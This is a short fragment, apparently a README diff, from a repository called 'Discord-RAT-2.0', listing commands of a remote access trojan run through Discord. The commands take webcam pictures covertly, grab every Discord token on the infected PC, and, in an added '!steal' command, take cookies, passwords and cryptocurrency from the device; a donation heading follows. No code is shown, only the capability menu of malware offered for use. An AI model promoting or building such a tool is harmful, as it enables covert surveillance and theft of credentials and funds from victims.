CryptoChristian12/Discord-RAT-2.0/README.md

---> !selectcam = Select camera to take a picture out of (default will be camera 1)/ Syntax "!selectcam 1" --> !webcampic = Take a picture out of the selected webcam --> !grabtokens = Grab all discord tokens on the current pc --> !help = This help menu
+--> !selectcam = Select camera to take a picture out of (default will be camera 1)/ Syntax "!selectcam 1" --> !webcampic = Take a picture out of the selected webcam --> !grabtokens = Grab all discord tokens on the current pc --> !steal = Steals all the information from the device (cookies, passwords, crypto,...)
+--> !help = This help menu

 ```

 ## Donation